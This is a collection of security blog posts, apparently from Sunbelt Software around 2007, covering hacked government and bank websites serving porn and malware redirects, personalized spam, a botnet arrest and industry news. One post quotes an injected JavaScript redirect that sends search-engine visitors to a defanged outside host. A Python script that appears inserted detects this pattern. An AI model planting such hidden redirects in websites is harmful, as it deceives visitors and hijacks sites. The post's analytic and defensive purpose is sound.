Mystery: I’m curious to know the back-story behind this…

Odd little post by a Michigan ABC affiliate:

We understand that inappropriate advertisements are appearing on a small number of user computers on Web sites across the Internet, including abc12.com.

The source seems to be Spyware. Some web users may have inadvertently installed Spyware (commonly known as Zango or other third party Spyware) without knowing it by viewing a video from a disreputable Web site, playing a game or downloading an application such as icons, smiley faces or other software.

When users with infected computers search Web sites, inappropriate and unapproved ads may appear within normal advertising space without anyone’s control and no revenue associated.

We want to reassure those who may have seen inappropriate ads on abc12.com that these ads are not coming from us.

Link here. [Update: They have now changed the text.]

Alex Eckelberry

Businesses to spend more on security as a percentage of budget

Here’s a nice, self-serving press release for me to post:

Spending on security technology, training, assessments, and certification now accounts for one-fifth of total technology budgets, according to research from the Computing Technology Industry Association (CompTIA).

A survey of 1,070 organizations found that on average, they spent 20 percent of their total technology budget in 2006 on security-related expenses. That’s up from 15 percent in 2005, and 12 percent in 2004.

Organizations also expect to increase spending across all areas related to security in the next 12 months. Nearly one-half of respondents to the CompTIA survey said they intend to increase spending on security-related technologies; and one-third of respondents expect to increase spending on security training. Among those expecting to increase spending, the average increase is in the range of 19-23 percent, regardless of area.

The survey also showed that for each dollar spent on security, about 42 cents is allocated for technology product purchases; 17 cents for security-related processes; 15 cents for training; 12 cents for assessments; 9 cents for certification; and the balance on other items.

Antivirus software, firewalls and proxy servers continue to be the top technologies for security enforcement, utilized by nearly all organizations. The past two years have seen a significant increase in the use of multiple security enforcement technologies to combat attacks, including firewalls, proxy servers, intrusion detection systems, physical access control, multi-factor authentication, and other technologies.


Release here.

Alex Eckelberry

Comedy of errors: Marin County still serving malware-pushing porn.

Ed Dickson, a fellow blogger, noted today that the now-infamous Marin County Transportation Authority website was still serving porn.

Nah, I knew that stuff might be showing up in the Google cache, but as far as I knew as of Friday, it was clean. So I figured I’d do a quick check for myself.

I was a bit surprised to find out he was right. The Marin County website is back to happily serving porn, after all that’s happened.

A simple Google search using the search term “porn sex site:tam.ca.gov” shows the results.


Some pretty rough stuff, I might add…


And attempts to get you to install malware…


I admit, at this point I feel pretty sorry for these folks.

Let’s hope the Government’s peeps don’t try and shut down teh internets again.

Alex Eckelberry

Random: Some Vista adoption numbers

Thought I’d share these numbers with you.

Client agent OS usage by CounterSpy Enterprise:

Windows XP 82.91%
Windows 2000 14.88%
Server 2003 1.83%
Vista build 6000 0.32%
Windows 98 0.03%
Windows NT 4 0.02%
Vista build 5744 0.00%
Vista build 5600 0.00%
Vista build 6001 0.00%
Windows ME 0.00%

This is a sampling of what operating system CounterSpy Enterprise agents deployed at customer sites report back. In this particular sampling, the bias will be toward small to medium business, and shows a very slow adoption of Vista in business environments.

Now, what our website sees:

Windows XP 83.90%
Vista 9.38%
Windows 2000 3.59%
Server 2003 1.62%
Windows 98 1.33%
Windows ME 0.14%
Windows NT 0.02%
Windows 95 0.02%

These are the operating system versions as reported by the browser to our main website. This would reflect a mix of more general usage — consumers and business.

I’d be curious to know what others are seeing out there as well.

Alex Eckelberry
Update: Panda gives their take here.

Bank of Ghana, others, compromised

The Bank of Ghana is serving porn.

A Yahoo search brings up some startling results (thumbnailed due to highly graphic content):


Narrowing down the search a wee bit:


Ouch, nasty stuff.

These pages redirect to porn (graphic content).


The code looks for referrals from search engines. Example:

http://rainbowdisplays(dot)com/xxxxx/fetish(dot)js

function f(){
// Only visitors who arrived from a search engine are redirected. t is set to the
// engine's query-string parameter name; it stays empty for direct visits.
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
// Fire only when the referrer actually carries a search query ("?q=" or "&q=" etc.),
// then bounce the visitor to the redirector with the original referrer and page URL.
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location=("http://grandsupport(dot)net/td/in(dot)cgi?13&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=fetish");
}window.onFocus = f()

This loads the site grandsupport(dot)net.
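As an added example (not code from the page, and not from the site in question), here is a small Python check a site owner could run over a suspect script: it recognizes the referrer-gated redirect pattern above, pulls out the engine list and the destination host, and replays the gate on sample Referer values to show why a direct visit never triggers it. The SAMPLE_JS string is a trimmed, constructed copy of the script quoted above with its “(dot)” defanging kept; the regular expressions and function names are my own.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the referrer-gated redirect script quoted on the page,
# trimmed to three engines, with the page's "(dot)" defanging kept so that
# nothing in this file resolves to a live host.
SAMPLE_JS = r'''
function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("aol.")!=-1)t="query";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location=("http://grandsupport(dot)net/td/in(dot)cgi?13&seoref="+encodeURIComponent(document.referrer));
}window.onFocus = f()
'''

# One `if(r.indexOf("<engine>")!=-1)t="<param>";` clause per search engine.
ENGINE_RE = re.compile(r'r\.indexOf\("([^"]+)"\)\s*!=\s*-1\)\s*t="([^"]*)"')
# The `window.location=` assignment that performs the redirect.
REDIRECT_RE = re.compile(r'window\.location\s*=\s*\(?\s*"(https?://[^"?]+)')


def analyze(js):
    """Flag a script as a referrer-gated redirect and pull out its profile.

    Returns None when the script does not read document.referrer, has no
    engine-to-parameter clauses, or has no window.location target.
    """
    if "document.referrer" not in js:
        return None
    engines = dict(ENGINE_RE.findall(js))
    target = REDIRECT_RE.search(js)
    if not engines or not target:
        return None
    return {
        "engines": engines,                               # e.g. {"google.": "q"}
        "target_host": urlsplit(target.group(1)).netloc,  # where victims are sent
    }


def would_redirect(profile, referrer):
    """Replay the script's gate on a given Referer value.

    Mirrors the JavaScript: the last matching engine wins, and the referrer
    must also carry that engine's query parameter. Direct visits (empty
    referrer) and engine home pages never trigger it, which is why a site
    owner loading the page by hand sees nothing wrong.
    """
    param = ""
    for needle, p in profile["engines"].items():
        if needle in referrer:
            param = p
    if not param:
        return False
    return ("?" + param + "=") in referrer or ("&" + param + "=") in referrer


if __name__ == "__main__":
    prof = analyze(SAMPLE_JS)
    print("redirects to:", prof["target_host"])
    for ref in ("", "http://www.google.com/", "http://www.google.com/search?q=test"):
        print(repr(ref), "->", would_redirect(prof, ref))
```

To check a live page the same way, fetch it once with no Referer and once with a search-engine Referer carrying a query parameter and compare the responses; the injected script above only acts on the second.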

Let’s hope they get this cleaned up soon (we have notified them).

Alex Eckelberry
(Thanks to Sunbelt researcher Adam Thomas for this.)

Yet Another Meaningless iPhone Rant: Apple deserves to lose its place as a phone provider


I was rooting for Apple’s iPhone. I even had my kids watch Jobs’ extraordinary keynote earlier this year.

I was irritated, but somewhat forgiving, of Apple’s decision to allow only AT&T as a provider. It was arrogant, but it was also typically Apple — and it was worth overlooking in light of such a cool phone. Even the whole price drop fiasco didn’t bother me that much.

And we all know that after a while, a few people figured out a way to unlock the phone so it would actually work on a phone system they actually want to use (Apple’s stock price even went up when the first hack was announced).

Well, Apple didn’t seem to notice the message being loudly telegraphed to it. Because, as we all know, Apple, in an even more astounding and ridiculous act of audacity, then turned hacked phones temporarily into a brick. This was an act so stupid, it boggles the mind.

In my opinion, they should have no future, as a phone provider. Because they refuse to even contemplate how the phone business works. They decided to create their own playbook, and they are now going to get hit in the head with it.

What’s the playbook for phones? You come out with versions that support both TDMA/CDMA and GSM infrastructures. You partner with a number of phone companies that blow the phone out for cheap in order to get subscribers. You allow your phone (even tacitly) to become unlocked. And if your phone is hot, you sell millions upon millions of them (the RAZR has sold over 100 million phones — and Apple has bragging rights on a million phones sold?).

Customers are a precious commodity.

Competition is fierce in this business, and one only has to look at the new Tilt, BlackBerry 9000 and LG Voyager to see the handwriting on the wall (heck, what about the low-priced Palm Centro?). Even Zune is starting to go DRM-free now (at least partially), so those slick iPods may be less interesting by the minute.

Apple’s future as a phone provider is bleak.

I’m disgusted by Apple’s jackanape arrogance, and it’s even more regrettable since they have offerings which I believe are truly valuable and need more adoption. They are doing the same stupid things that nearly killed them as a company back in the late 80s and early 90s with closed systems. As just one example, iTunes is a potential goldmine, and they could focus on getting as many iPhones out there as possible to build a larger market for iTunes (as well as getting other hardware devices to support iTunes), to build content-based recurring revenue streams.

I hope Jobs gets the message: Your customers are everything that ever matters in business.

If you treat your customers like idiots, a terrible thing happens: Nothing.

In other words, you get no customers.

Alex Eckelberry

Brookhaven National Labs hacked, serving porn

One example:

www.star.bnl.gov/STAR/html/tmp/pub/effplots/virgin(dot)html


And there’s plenty more.

Now, the national security of our country is not at risk (as far as we know). These are just porn redirects coming off of places in Brookhaven’s site.

Alex Eckelberry
(Brookhaven has been contacted and they are taking these down right away.)

Marin County safe, but still not clean…and we found another hacked ca.gov website

Despite all the hullabaloo, the now-infamous Marin County TAM website, responsible for a federal shutdown of ca.gov sites, is still not completely clean. While it’s not redirecting to malware or porn anymore, it still has some dirt underneath the fingernails.

You can play your own version of Find Waldo with this: Go to the site, view source and find the hacked links… (need a hint?).

You can also see that their junk is still showing up on Google.


(These links are both dead, but still show up in Google searches).

Ok, so that was fun. But let’s do a little more hunting, shall we?

Using the simple search term sex porn site:ca.gov, we now find that madera.courts.ca.gov has experienced some pwnage of its own:


Going to these pages, we see this:


We find the intersection of jurisprudence and… Viagra!

Just another day in the life of a security company. Something interesting, every day.

Alex Eckelberry
(Thanks to Sunbelt researcher Suzi Turner for the help.)

More on the California government shutdown

Yesterday, we reported on a federal shutdown of “ca.gov” sites to fix a hack.

Well, we have a little more information on this.

It was the Marin County government website that started all of this — something we reported back on September 12th.

They were warned. But they didn’t believe the warnings:

Marin officials first learned of the hacker’s use of the site when private online security companies warned that the Web page had been infiltrated.

Steinhauser said she and other staffers at first were suspicious of the online warnings from security firms because they were worried they could be a form of “phishing” used by hackers seeking to hijack Web sites.

Well, here’s some email that Suzi Turner (who works for Sunbelt as a security consultant) had sent them, on September 12th (she also left them a voice mail).

I had also sent them an email on September 12th:


And I’m pretty darned sure we’re not the only ones who alerted them.

There’s also an SC Mag story this morning, with speculation that this was an iFrame hack. No, actually, it was a DNS hack.

So, was shutting down the entire system overkill? Of course. It was complete overkill. But on the other hand, it’s a wake up call: Keep your site clean. And for pete’s sake, please heed the warnings of security researchers when they send you email.

Alex Eckelberry
(thanks to Ferg for his help, and also the numerous unnamed security researchers who helped on this as well.)

Sunbelt’s Greg Kras featured as a “guru” in Redmond Mag


OK, now he’s going to be impossible to have around.

In his latest book, Blink, Malcolm Gladwell tries to discover how great thinkers and decision makers get to be so great. There is no one answer, he concludes. Great decisions can be made in the blink of an eye, but only after years and sometimes decades of building expertise.

Redmond magazine set out on a similar journey, to find out how the visionaries that drive today’s third-party innovations came to be so visionary. We interviewed a dozen serial entrepreneurs, CTOs and company founders to find out where their ideas come from, and how they turn them into the products that you all know and love.

Article here.

All joking aside, Greg is a genuine guru and we’re proud to see him recognized for his talents.

Alex Eckelberry

Strategic technology partnership announced

While I was at the VB conference in Vienna a couple of weeks ago, I would occasionally disappear for long periods of time. While most, I’m sure, assumed that I was spending time at the nearby Birdland jazz club (well, I did spend some time there), I was working on a strategic technology partnership with Vienna-based H&S Software. H&S is a technology leader in the area of data retention and archiving.

Today, we announced that partnership officially. The companies will work together on a strategic basis in the areas of email archiving and data retention.

So, I got to kill more than a few birds with one stone: Attend a great conference, do some important business, see some of the sights of Austria and hang out at the Birdland jazz club. All in all, a good trip.

You’ll see more on our plans for email archiving in the coming weeks. It’s enough to say that I’m very excited by this project 😉

Alex Eckelberry

California cleans up hacked websites

Good news. Maybe all of our constant kvetching is paying off (here, here, etc.)?

SACRAMENTO — A hacker who directed people from a county website to pornography triggered a federal shutdown of state government Internet and e-mail service late Tuesday afternoon, according to a spokesman for Gov. Arnold Schwarzenegger.

The state system, which uses the domain name “ca.gov,” was never hacked and all of its websites and e-mail should be functioning within a few hours, spokesman Aaron McLear said.

He said the federal government moved to suspend the state’s Internet and e-mail service after someone hacked into a county website that contained the domain name ca.gov and redirected people to a pornography site. McLear said he did not know which county website was hacked.

Link here (via Ferg).

Alex Eckelberry

Another injustice?

I would love to see a copy of that hard drive…

David Farr was once employed as a respiratory therapist at St. Francis Hospital in Indianapolis, Ind. He started there in October 2000 and was the only male respiratory therapist.

All of the seven respiratory therapists share a small office divided into individual cubicles with one computer in the center of the room. Each therapist is assigned a password, though it’s unclear whether logs are kept of each user’s individual activities.

In July 2005, Farr’s supervisor informed him he was suspended from work because pornographic entries were found in his “Favorites” file, apparently a reference to Web sites bookmarked. Farr denied being responsible and said he was rebuffed when he asked for details about the allegations.

Farr was fired in August 2005. An e-mail message from the hospital’s lawyer at the time claims to “have evidence that provides us with reasonable belief that he was accessing pornographic Web sites on his work computer.”

After losing his job, Farr went through the formal grievance process listed in the hospital handbook and met with no success. He filed a lawsuit after the grievance committee upheld his termination in December 2005.

What makes this case relevant to Police Blotter is that Farr claims that “St. Francis failed to install and update effective antivirus protection on its computers” and that any pornographic bookmarks were inserted by malware. He also claims that antivirus software was required by the Health Insurance Portability and Accountability Act.

Farr even retained a computer forensics specialist who concluded: “No one had intentionally loaded the list of Web sites on the computer. Rather, the list was placed on the respiratory therapists’ computer by a common and well-known Internet virus that promotes fee-generating pornographic sites.”

That is plausible. One of the malware programs known to inject porn bookmarks is CoolWebSearch, also called CWS or CoolWWWSearch, and it’s been around since 2003. Some reports have estimated that 5 million sites are infected with it and that more than 60 strains of it exist.

More here.

Alex Eckelberry
(Thanks Francesco)

Increasing use of personalized spam

Last week, we received a sample of personalized spam. The name of the recipient has been redacted — however, it is an accurate spelling of that person’s name.


It goes without saying that the recipient of the spam has no idea who “Tony” is.

So how did this happen? While the first thought might be spammers scraping names from Facebook or LinkedIn, this may very well have occurred by scraping publicly-available alumni lists. There are a lot of open alumni lists out there, as this Google search shows. And, of course, Augustana College is one of those sites with an open alumni list.

We’ve seen more and more personalized spam attacks over the last several months, and it is a troubling trend. For obvious reasons, a finely targeted spam has a higher chance of being read and acted upon. And that’s one more reason for the urgent need for broad user education and ongoing improvements in security products. And when I say user education — I mean blast it out on mass media through Ad Council methods or what have you.

Alex Eckelberry

The Wildlist is dead, long live the Wildlist

Andreas Marx gave a presentation at the Virus Bulletin conference in Vienna, and I’m posting it here for reference.

Paper here.

Presentation (PPT and PDF)*.

From Andreas:

During the Virus Bulletin 2007 Conference I gave a presentation on the topic “The WildList is dead, long live the WildList!”.

It actually confirms that some AV product tests are very problematic, especially if they are only based on the WildList as reference. I’ve created some interesting statistics to show that the WildList cannot be used anymore (in its current state) to show how good or bad products are…

The feedback from the industry was quite interesting… for example, Panda has blogged that they strongly agree on my comments while Sophos disagrees that the WildList is not useful for testing purposes anymore:

Back from Virus Bulletin 2007 (Panda Research Blog)

Is the Wildlist still relevant? (Sophos Blog). I also saw a comment from another AV tester here. And Authentium’s Eric Kumar has a blog up as well on the subject.

Alas, Andreas caught me on camera swigging some substance at the Virus Bulletin dinner. You can see one of the frightful pictures here.

Alex Eckelberry
* (Copyright is held by Virus Bulletin Ltd, but is made available on this site for personal use free of charge by permission of Virus Bulletin.)

Botmaster busted

I’m a little late on this one but wanted to get something up.

Yesterday, a botmaster was busted. But this one is close to home: He was allegedly behind the DDoS attack on CastleCops earlier this year.


(Photograph taken from a Yahoo Member Directory, which appears to match the description in the DOJ press release below.)

United States Attorney McGregor W. Scott announced today the arrest of GREG KING, 21, of Fairfield, California, and the unsealing of an Indictment returned on September 27, 2007, charging KING with four counts of electronic transmission of codes to cause damage to protected computers.

This case is the product of an extensive investigation by the Federal Bureau of Investigation.

According to Assistant United States Attorney Matthew D. Segal, a prosecutor with the Computer Hacking and Intellectual Property section of the U.S. Attorney’s Office who is handling the case, the Indictment alleges that KING used a “botnet” to attack computer servers. A botnet is a network of infected computers that, unbeknownst to their owners, are compromised by a hacker and programmed to respond to a hacker’s commands. The infected computers are referred to as “bots,” “zombies,” or “drones.” According to documents filed with the court, KING allegedly controlled over seven thousand such “bots” and used them to conduct multiple distributed denial of service attacks against websites of two businesses. In a distributed denial of service attack, a hacker directs a large number of infected computers (“bots”) to flood a victim computer with information and thereby disable the target computer. On the Internet, KING was also known as “Silenz, Silenz420, sZ, GregK, and Gregk707.”

Press release here, indictment here.

Alex Eckelberry
(Hat tip to Dre)

Oh those silly politicos again

This man is clearly in need of a clue-by-four:

European Union interior ministers debated Monday proposals to sanction or shut down Internet sites spreading “terrorist propaganda” and bomb-making instructions.

EU Justice Commissioner Franco Frattini told reporters that he had urged the ministers, during informal talks in Lisbon, Portugal, “to make punishable activities of misuse of the Internet.”

“My intention of course is not to limit freedom of expression,” he said.

“My intention is … to introduce sanctions against those who disseminate terrorist propaganda or instruct on websites how to make a bomb. This has nothing to do with freedom of expression.

“If a given website is found instructing people to make a bomb, the only possible result is to disconnect, or to close such a website,” he said.

First, let’s look at a simple Google search, “how to make a bomb”. Over 17 million hits. Ok, so there’s the practical aspect.

But the bigger question is: Where does it start, and where does it stop?

What, are we now going to ban certain “potentially dangerous” books in libraries?

Or do we ultimately go down the path of Thailand, which outright banned YouTube in their country? And let’s not even talk about China.

The Internet is a big fat load of tubes and happiness that shovels out all kinds of useless and useful information. And I know that some people are irresponsible with what information they disseminate.

However, it’s one thing to crack down on terrorist cells that use the net for criminal purposes (which can be done through standard surveillance practices). But it’s another to start coming out with useless restrictions which ultimately will lead to a censored society.

Alex Eckelberry
(Thanks, Richard)